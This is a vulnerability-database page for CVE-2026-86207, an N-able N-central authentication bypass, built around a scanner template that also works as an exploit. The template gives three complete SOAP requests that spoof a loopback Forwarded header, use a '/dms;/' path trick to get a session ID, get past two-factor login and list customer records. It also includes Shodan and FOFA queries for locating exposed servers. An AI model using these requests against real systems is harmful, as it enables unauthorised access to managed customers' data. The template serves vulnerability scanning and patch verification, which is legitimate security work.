N-able N-central - Authentication Bypass
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| CVE-2026-86206 | 5 Sep 202621:35 | – | circl | |
| CVE-2026-86207 | 8 Sep 202612:12 | – | circl | |
| CVE-2026-86206 | 5 Sep 202619:17 | – | cve | |
| CVE-2026-86207 | 5 Sep 202619:12 | – | cve | |
| CVE-2026-86206 Access control filter bypass allows unauthorised access to APIs | 5 Sep 202619:17 | – | cvelist | |
| CVE-2026-86207 Authentication bypass leads to unauthorised access to N-central | 5 Sep 202619:12 | – | cvelist | |
| EUVD-2026-72022 | 5 Sep 202619:12 | – | euvd | |
| EUVD-2026-72023 | 5 Sep 202619:17 | – | euvd | |
| CVE-2026-86206 | 5 Sep 202620:17 | – | nvd | |
| CVE-2026-86207 | 5 Sep 202619:16 | – | nvd |
10
id: CVE-2026-86207
info:
name: N-able N-central - Authentication Bypass
author: rapid7,DhiyaneshDk
severity: critical
description: |
An authentication bypass in N-central < 2026.3 HF 3 leads to authentication bypass in internal-only APIs.
impact: |
Attackers can bypass authentication, potentially gaining unauthorized access to internal APIs and sensitive data.
remediation: |
Upgrade N-able N-central to version 2026.3.1.13 (2026.3 Hotfix 3) or later.
Hosted N-central environments have already been patched by the vendor.
reference:
- https://www.rapid7.com/blog/post/ve-cve-2026-86206-cve-2026-86207-n-able-n-central-authentication-bypass-fixed/
- https://me.n-able.com/s/security-advisory/aArVy0000002LTNKA2/cve202686206-access-control-filter-bypass-allows-unauthorised-access-to-apis
- https://documentation.n-able.com/N-central/Release_Notes/GA/Content/N-central_2026.3_HF3_Release_Notes.htm
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-86207
cwe-id: CWE-287
metadata:
verified: true
max-request: 3
vendor: n-able
product: n-central
shodan-query: title:"N-central"
fofa-query: title="N-central"
tags: cve,cve2026,n-able,n-central,auth-bypass,2fa-bypass,soap
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
POST /dms;/services/ServerUI HTTP/1.1
Host: {{Hostname}}
Forwarded: for="127.0.0.\1"
Content-Type: text/xml; charset=utf-8
SOAPAction: ""
<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ei="http://ei.server.nable.com">
<soapenv:Body>
<ei:sessionHello>
<ei:in0>3</ei:in0>
</ei:sessionHello>
</soapenv:Body>
</soapenv:Envelope>
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains_all(body, 'SessionID')"
- "contains(content_type, 'text/xml')"
condition: and
internal: true
extractors:
- type: regex
name: session_id
part: body
group: 1
regex:
- '<SessionID[^>]*>([0-9]+)</SessionID>'
internal: true
- raw:
- |
POST /dms;/services/ServerUI HTTP/1.1
Host: {{Hostname}}
Forwarded: for="127.0.0.\1"
Content-Type: text/xml; charset=utf-8
SOAPAction: ""
<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ei="http://ei.server.nable.com">
<soapenv:Body>
<ei:userTwoFactorLogin>
<ei:sessionID>{{session_id}}</ei:sessionID>
<ei:userID>1</ei:userID>
<ei:password>dummy</ei:password>
</ei:userTwoFactorLogin>
</soapenv:Body>
</soapenv:Envelope>
matchers:
- type: dsl
dsl:
- "status_code == 500"
- "contains_all(body, 'ConfigProfileUtils.getConfigProfile()', 'NullPointerException')"
condition: and
internal: true
- raw:
- |
POST /dms;/services/ServerUI HTTP/1.1
Host: {{Hostname}}
Forwarded: for="127.0.0.\1"
Content-Type: text/xml; charset=utf-8
SOAPAction: ""
<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ei="http://ei.server.nable.com">
<soapenv:Body>
<ei:customerList>
<ei:in0>{{session_id}}</ei:in0>
<ei:in1>1</ei:in1>
<ei:in2>true</ei:in2>
<ei:in3>false</ei:in3>
</ei:customerList>
</soapenv:Body>
</soapenv:Envelope>
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains_all(body, 'customerListResponse', '<CustomerID', '<CustomerName')"
- "contains(content_type, 'text/xml')"
condition: and
# digest: 4b0a00483046022100ef566db279d304dd1f83aa5079400b26cf12edf1e31862a4be257bc24cc57ef5022100a563b794e924052451212417e698ba4b2802e6dcef4bbad9b4394b3c85e17bb7:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Sep 2026 17:44Current
CVSS 47.7
EPSS0.00296
SSVC